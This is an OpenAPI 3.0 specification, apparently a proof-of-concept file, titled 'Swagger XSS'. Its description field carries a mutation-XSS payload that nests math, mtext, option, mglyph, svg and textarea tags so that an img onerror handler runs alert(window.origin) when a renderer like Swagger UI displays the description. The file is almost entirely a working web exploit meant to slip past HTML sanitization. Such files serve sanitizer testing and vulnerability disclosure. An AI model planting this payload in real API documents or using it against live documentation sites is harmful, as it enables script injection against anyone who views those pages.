openapi: "3.0.0"

info:
  title: Swagger XSS
  description:
    <h4>xss</h4>
    <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(window.origin)'>">
